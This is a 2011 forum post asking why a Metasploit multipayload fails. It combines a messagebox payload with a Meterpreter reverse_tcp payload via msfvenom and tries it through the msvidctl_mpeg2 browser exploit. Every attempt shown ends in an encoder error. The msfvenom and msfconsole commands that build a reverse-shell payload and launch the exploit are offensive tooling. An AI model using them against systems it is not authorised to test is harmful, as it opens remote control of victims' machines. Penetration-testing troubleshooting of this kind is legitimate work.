dig2play

MSF4 custom/generic with multipayloads

Discussion created by dig2play on Oct 28, 2011
Latest reply on Oct 28, 2011 by dig2play

Hi everyone.

I've been playing around with the newer MSF4 (Framework: 4.1.0-release.13988, Console: 4.1.0-release.13581) multipayload support using msfvenom and the custom/generic payload, but there seems to be a dearth of information on what the payload supports in terms of encodings and compatibility.

Basically I'm looking at how a server-side service can be shut down, then have Meterpreter listen on its no-longer-bound port (the exploit would come in on another port).

Essentially I created a multipayload using msfvenom with the msgbox and Meterpreter back-to-back, as an exe, raw, and .rb. I've tried leaving the encoding setting alone and setting it to None. (Note that the custom/generic payload .rb source says something about only allowing None encoding.)

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=thread > test\msgbox.raw

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=thread > test\msgterp.raw

I also tried it with EXITFUNC set to "none":

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/messagebox -f raw -e generic/none EXITFUNC=none > test\msgbox.raw

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p windows/meterpreter/reverse_tcp -f raw -e generic/none -t test/msgbox.raw -k LHOST=192.168.1.100 EXITFUNC=none > test\msgterp.raw

Then I need to write the raw multipayload to something that the generic/custom payload can use (note that I've tried writing to the raw, exe, and .rb formats):

c:\metasploit>ruby\bin\ruby.exe msf3\msfvenom -p - -f exe > msf.exe < test\\msgterp.raw

Finally it's time to try the multipayload out with generic/custom (note that I reloaded the exploit each time before trying to set and exploit):

msf > use exploit/windows/browser/msvidctl_mpeg2

msf  exploit(msvidctl_mpeg2) > set PAYLOAD generic/custom

PAYLOAD => generic/custom

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.raw

PAYLOADSTR => c:\metasploit\test\msf.raw

msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADSTR c:\\metasploit\\test\\msf.exe

PAYLOADSTR => c:\metasploit\test\msf.exe

msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.raw

PAYLOADFILE => c:\metasploit\test\msf.raw

msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

msf  exploit(msvidctl_mpeg2) > set PAYLOADFILE c:\\metasploit\\test\\msf.exe

PAYLOADFILE => c:\metasploit\test\msf.exe

msf  exploit(msvidctl_mpeg2) > exploit

[-] Exploit failed: No encoders encoded the buffer successfully.

So I found an explanation of what the "No encoders encoded..." error is supposed to mean (http://en.wikibooks.org/wiki/Metasploit/Frequently_Asked_Questions). This is where stager payloads come in, I suppose.

Is the cause of the error the windows/msgbox payload because it's not staged? Or is it that multipayloads aren't staged? If it's the latter, then I can't see how multipayloads would ever work unless they were staged. Combining 2 payloads would likely be larger than a single payload.

Can someone please at least explain the encodings and formats that should be compatible with the generic/custom payload so I can rule that out? I've only found a couple of references to multipayload support.

Thanks in advance! I promise to reply with how I got this working once I do.
